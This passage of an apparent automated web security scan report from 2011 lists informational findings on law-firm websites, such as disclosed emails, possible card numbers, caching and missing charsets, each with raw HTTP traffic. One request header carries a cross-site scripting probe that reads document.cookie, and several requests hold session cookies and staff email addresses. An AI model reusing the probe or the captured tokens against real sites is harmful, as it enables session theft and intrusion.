Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:25 GMT;path=/
Content-Length: 2465

/**
* swapImage - jQuery plugin for swapping image
*
* Copyright (c) 2008 tszming (tszming@gmail.com)
*
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/licenses/gpl.html
*
*/
(function($){$.swapImage=function(i,pre
...[SNIP]...

17.92. http://www.vault.com/scripts/main.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /scripts/main.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /scripts/main.js HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:21 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 23 Dec 2010 14:12:44 GMT
ETag: "e0962-e88d-76a2ef00"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: application/x-javascript
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:24 GMT;path=/
Content-Length: 59533

/** Popup Window **/
var jsurl = '/scripts/jquery.popupWindow.js';
document.write('<script src="' + jsurl + '" type="text/javascript"></script>');

String.prototype.trim = function() {
   return
...[SNIP]...
<slipkin@vault.com>
...[SNIP]...
<jcovington@vault.com>
...[SNIP]...

17.93. http://www.wileyrein.com/js/script.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/script.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /js/script.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Content-Length: 7204
Content-Type: application/x-javascript
Content-Location: http://www.wileyrein.com/js/script.js
Last-Modified: Tue, 14 Apr 2009 21:28:41 GMT
Accept-Ranges: bytes
ETag: "80ca1bfb47bdc91:53a7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 19 Jan 2011 15:08:55 GMT

function MM_findObj(n, d) { //v3.0
var p,i,x; if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
if(!(x=d[
...[SNIP]...
ning
   objWindow.moveTo(intLeft, intTop);
       
   objWindow.focus();
}

/*--------------------------------------------------------------------
* javascript method: "pxToEm"
* by:
Scott Jehl (scott@filamentgroup.com)
Maggie Wachs (maggie@filamentgroup.com)
http://www.filamentgroup.com
*
* Copyright (c) 2008 Filament Group
* Dual licensed under the MIT (filamentgroup.com/examples/mit-license.txt) and GPL (filamentgroup.com/examples/gpl-license
...[SNIP]...

18. Credit card numbers disclosed  previous  next
There are 2 instances of this issue:

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.


18.1. http://www.hoganlovells.com/files/Publication/7871edd4-f660-4f47-811a-539ef0d25b84/Presentation/PublicationAttachment/04e62785-8fe2-40c3-a8cb-556982a16ea7/FDPF1_final.pdf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /files/Publication/7871edd4-f660-4f47-811a-539ef0d25b84/Presentation/PublicationAttachment/04e62785-8fe2-40c3-a8cb-556982a16ea7/FDPF1_final.pdf

Issue detail

The following credit card number was disclosed in the response:

Request

GET /files/Publication/7871edd4-f660-4f47-811a-539ef0d25b84/Presentation/PublicationAttachment/04e62785-8fe2-40c3-a8cb-556982a16ea7/FDPF1_final.pdf HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;

Response

HTTP/1.1 200 OK
Content-Length: 206447
Content-Type: application/pdf
Last-Modified: Tue, 11 Jan 2011 16:06:02 GMT
Accept-Ranges: bytes
ETag: "ff48271a9b1cb1:1ad7"
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Wed, 19 Jan 2011 15:58:54 GMT
Connection: close

%PDF-1.4%....
648 0 obj<</Linearized 1/L 206447/O 650/E 54246/N 17/T 193371/H [ 1556 976]>>endobj xref648 630000000016 00000 n
0000002724 00000 n
0000002889 00000 n
0000003398 0
...[SNIP]...
</BaseFont/VAMIUB+MyriadPro-Regular/Encoding 680 0 R/FirstChar 30/FontDescriptor 670 0 R/LastChar 122/Subtype/Type1/ToUnicode 671 0 R/Type/Font/Widths[523 523 212 0 0 0 0 0 0 0 284 284 0 0 207 307 207 0 513 513 513 513 513 0 0 0 513 0 0 0 0 0 0 406 0 612 542 580 666 492 487 646 652 239 0 0 472 804 658 689 532 0 538 493 497 647 558 0 0 0 553 0 0 0 0 0 0 482 569 448 564 501 29
...[SNIP]...

18.2. http://www.hoganlovells.com/ourpeople/List.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /ourpeople/List.aspx

Issue detail

The following credit card number was disclosed in the response:

Request

GET /ourpeople/List.aspx HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 16:04:26 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1075; path=/
Set-Cookie: PortletId=13201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 2633790


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
<td class="list" nowrap="nowrap">
                                +49 30 726 115 383&nbsp;
                               </td>
...[SNIP]...
<td class="list" nowrap="nowrap">
                                +49 30 726 115 383&nbsp;
                               </td>
...[SNIP]...

19. Cacheable HTTPS response  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://immigration.ebglaw.com
Path:   /TrkrSSL.html

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Request

GET /TrkrSSL.html HTTP/1.1
Host: immigration.ebglaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Thu, 02 Dec 2010 22:02:23 GMT
Accept-Ranges: bytes
ETag: "fe5bfa986c92cb1:0"
Server: Microsoft-IIS/7.5
Date: Wed, 19 Jan 2011 18:10:05 GMT
Connection: close
Content-Length: 2619

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...

20. HTML does not specify charset  previous  next
There are 16 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


20.1. http://dcregistry.com/cgi-bin/surveys/survey.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dcregistry.com
Path:   /cgi-bin/surveys/survey.cgi

Request

GET /cgi-bin/surveys/survey.cgi HTTP/1.1
Host: dcregistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:21:27 GMT
Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 1353


<FORM METHOD = "post" ACTION = "http://dcregistry.com/cgi-bin/surveys/survey.cgi">
<INPUT TYPE = "hidden" NAME = "db"
VALUE = "aad_look">
<INPUT TYPE = "hidden" NAME = "website"

...[SNIP]...

20.2. http://dcregistry.com/cgi-bin/wbn2/wbn.pl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dcregistry.com
Path:   /cgi-bin/wbn2/wbn.pl

Request

GET /cgi-bin/wbn2/wbn.pl?member=wbn;banner=NonSSI;page=01 HTTP/1.1
Host: dcregistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:07:36 GMT
Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 522

<HTML><HEAD><TITLE>WebAdverts Error!</TITLE></HEAD>
<BODY BGCOLOR="#ffffff" TEXT="#000000">
<HR><H1 ALIGN=CENTER>Invalid Destination</H1><HR>
<P>Sorry, but the server encountered an error while trying
...[SNIP]...

20.3. http://dcregistry.com/lawfirms.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dcregistry.com
Path:   /lawfirms.html

Request

GET /lawfirms.html HTTP/1.1
Host: dcregistry.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:08:36 GMT
Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 69576

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
   <title>Washington, DC Law Firms and Legal</title>
   <LINK REL=StyleSheet HREF="http://www.dcregistry.com/style.css" TYPE="
...[SNIP]...

20.4. http://dcregistry.com/users/CVCalhoun/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dcregistry.com
Path:   /users/CVCalhoun/index.html

Request

GET /users/CVCalhoun/index.html HTTP/1.1
Host: dcregistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:22:40 GMT
Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Length: 2885


<HTML><HEAD><TITLE>Employee Benefits Legal Resource Site</TITLE><META name="description" content="Legal research links, articles, speeches, sample attorney's online r.sum."><META name="keywords" cont
...[SNIP]...

20.5. http://ds.addthis.com/red/psi/sites/www.csmonitor.com/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.csmonitor.com/p.json

Request

GET /red/psi/sites/www.csmonitor.com/p.json HTTP/1.1
Host: ds.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: uid=4d1ec56b7612a62c; dt=X; psc=4; di=%7B%7D..1295452270.19F|1295378586.60|1293848200.66; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; bt=;

Response

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Length: 157
Content-Type: text/html
Set-Cookie: bt=; Domain=.addthis.com; Expires=Wed, 19 Jan 2011 18:07:50 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Fri, 18 Feb 2011 18:07:50 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Wed, 19 Jan 2011 18:07:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 19 Jan 2011 18:07:50 GMT
Connection: close

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (500 Internal Server Error) has occured in response to this request.
</BODY>
</HTML>

20.6. http://ds.addthis.com/red/psi/sites/www.wileyrein.com/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.wileyrein.com/p.json

Request

GET /red/psi/sites/www.wileyrein.com/p.json HTTP/1.1
Host: ds.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: uid=4d1ec56b7612a62c; dt=X; psc=4; di=%7B%7D..1295452270.19F|1295378586.60|1293848200.66; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; bt=;

Response

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Length: 157
Content-Type: text/html
Set-Cookie: bt=; Domain=.addthis.com; Expires=Wed, 19 Jan 2011 18:07:49 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Fri, 18 Feb 2011 18:07:49 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Wed, 19 Jan 2011 18:07:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 19 Jan 2011 18:07:49 GMT
Connection: close

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (500 Internal Server Error) has occured in response to this request.
</BODY>
</HTML>

20.7. http://money.cnn.com/magazines/fortune/bestcompanies/2010/snapshots/65.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /magazines/fortune/bestcompanies/2010/snapshots/65.html

Request

GET /magazines/fortune/bestcompanies/2010/snapshots/65.html HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:25:12 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=60, private
Expires: Wed, 19 Jan 2011 15:26:12 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 75163

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>100 Best Companies to Work For 2010: Arnold & Porter - from FORTUNE</title>
<meta HTTP-EQUIV="Pragma" CONTENT="no-c
...[SNIP]...

20.8. http://skaddenpractices.skadden.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skaddenpractices.skadden.com
Path:   /

Request

GET / HTTP/1.1
Host: skaddenpractices.skadden.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=34916643.540692983.1295449749.1295449749.1295451571.2; __utmz=34916643.1295451571.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/13|utmcmd=referral; Apache=173.193.214.243.1295460913738647; FRONTSKADDENSEC=d6220a6c3fc3ed10bcec7baef1e6e630; __utmz=108645632.1295461005.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=108645632.1929016302.1295461005.1295461005.1295461005.1; __utmc=108645632; __utmb=108645632.2.10.1295461005; FRONTSKADDEN=29340847b7f54c8a31121fcf97226cdc

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:16:07 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b PHP/5.2.5
Last-Modified: Wed, 22 Mar 2006 21:55:18 GMT
ETag: "9108b2-6a-40f9c728cfd80"
Accept-Ranges: bytes
Content-Length: 106
Content-Type: text/html

<HEAD>
<meta http-equiv="refresh" content="0;
url=http://www.skadden.com/Index.cfm?contentID=4">
</HEAD>


20.9. http://skaddenpractices.skadden.com/sec/images/tools_doc.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skaddenpractices.skadden.com
Path:   /sec/images/tools_doc.gif

Request

GET /sec/images/tools_doc.gif HTTP/1.1
Host: skaddenpractices.skadden.com
Proxy-Connection: keep-alive
Referer: http://skaddenpractices.skadden.com/sec/index.php?7ae3b
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=34916643.540692983.1295449749.1295449749.1295451571.2; __utmz=34916643.1295451571.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/13|utmcmd=referral; Apache=173.193.214.243.1295460913738647; FRONTSKADDENSEC=d6220a6c3fc3ed10bcec7baef1e6e630; __utmz=108645632.1295461005.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=108645632.1929016302.1295461005.1295461005.1295461005.1; __utmc=108645632; __utmb=108645632.2.10.1295461005; FRONTSKADDEN=29340847b7f54c8a31121fcf97226cdc

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 18:16:03 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3114
Content-Type: text/html

       <td rowspan="2">                        
           <table width="100%" border="0" cellspacing="0" cellpadding="15">                            
               <tr valign="top">                                
                   <td class="sub"><!-- #BeginEditable "body" -->
                                   <h1>E
...[SNIP]...

20.10. http://skaddenpractices.skadden.com/sec/images/tools_mail.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skaddenpractices.skadden.com
Path:   /sec/images/tools_mail.gif

Request

GET /sec/images/tools_mail.gif HTTP/1.1
Host: skaddenpractices.skadden.com
Proxy-Connection: keep-alive
Referer: http://skaddenpractices.skadden.com/sec/index.php?7ae3b
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=34916643.540692983.1295449749.1295449749.1295451571.2; __utmz=34916643.1295451571.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/13|utmcmd=referral; Apache=173.193.214.243.1295460913738647; FRONTSKADDENSEC=d6220a6c3fc3ed10bcec7baef1e6e630; __utmz=108645632.1295461005.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=108645632.1929016302.1295461005.1295461005.1295461005.1; __utmc=108645632; __utmb=108645632.2.10.1295461005; FRONTSKADDEN=29340847b7f54c8a31121fcf97226cdc

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 18:16:05 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3114
Content-Type: text/html

       <td rowspan="2">                        
           <table width="100%" border="0" cellspacing="0" cellpadding="15">                            
               <tr valign="top">                                
                   <td class="sub"><!-- #BeginEditable "body" -->
                                   <h1>E
...[SNIP]...

20.11. http://skaddenpractices.skadden.com/sec/images/tools_phone.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skaddenpractices.skadden.com
Path:   /sec/images/tools_phone.gif

Request

GET /sec/images/tools_phone.gif HTTP/1.1
Host: skaddenpractices.skadden.com
Proxy-Connection: keep-alive
Referer: http://skaddenpractices.skadden.com/sec/index.php?7ae3b
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=34916643.540692983.1295449749.1295449749.1295451571.2; __utmz=34916643.1295451571.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/13|utmcmd=referral; Apache=173.193.214.243.1295460913738647; FRONTSKADDENSEC=d6220a6c3fc3ed10bcec7baef1e6e630; __utmz=108645632.1295461005.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=108645632.1929016302.1295461005.1295461005.1295461005.1; __utmc=108645632; __utmb=108645632.2.10.1295461005; FRONTSKADDEN=29340847b7f54c8a31121fcf97226cdc

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 18:16:05 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3114
Content-Type: text/html

       <td rowspan="2">                        
           <table width="100%" border="0" cellspacing="0" cellpadding="15">                            
               <tr valign="top">                                
                   <td class="sub"><!-- #BeginEditable "body" -->
                                   <h1>E
...[SNIP]...

20.12. http://skaddenpractices.skadden.com/sec/scripts/resize.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skaddenpractices.skadden.com
Path:   /sec/scripts/resize.gif

Request

GET /sec/scripts/resize.gif HTTP/1.1
Host: skaddenpractices.skadden.com
Proxy-Connection: keep-alive
Referer: http://skaddenpractices.skadden.com/sec/index.php?7ae3b
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=34916643.540692983.1295449749.1295449749.1295451571.2; __utmz=34916643.1295451571.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/13|utmcmd=referral; Apache=173.193.214.243.1295460913738647; FRONTSKADDENSEC=d6220a6c3fc3ed10bcec7baef1e6e630

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 18:16:02 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b PHP/5.2.5
X-Powered-By: PHP/5.2.5
Set-Cookie: FRONTSKADDEN=29340847b7f54c8a31121fcf97226cdc; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3114
Content-Type: text/html

       <td rowspan="2">                        
           <table width="100%" border="0" cellspacing="0" cellpadding="15">                            
               <tr valign="top">                                
                   <td class="sub"><!-- #BeginEditable "body" -->
                                   <h1>E
...[SNIP]...

20.13. http://www.dcregistry.com/ns6side.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcregistry.com
Path:   /ns6side.htm

Request

GET /ns6side.htm HTTP/1.1
Host: www.dcregistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:48:11 GMT
Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6
Last-Modified: Sat, 17 Feb 2001 05:45:00 GMT
ETag: "3f89767-9df-37d7a317eaf00"
Accept-Ranges: bytes
Content-Length: 2527
Connection: close
Content-Type: text/html

<html>

<head>
<title>DC Registry</title>

<STYLE TYPE="text/css">
<!--
.index a:link { color: #0000ff; }
.index a:visited { color: #880088; }
.index a:active { color: #ffff00; }
.index a:hove
...[SNIP]...

20.14. http://www.fulbright.com/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /index.cfm

Request

GET /index.cfm?fuseaction=local.detail&site_id=299&link_name=Map and Directions HTTP/1.1
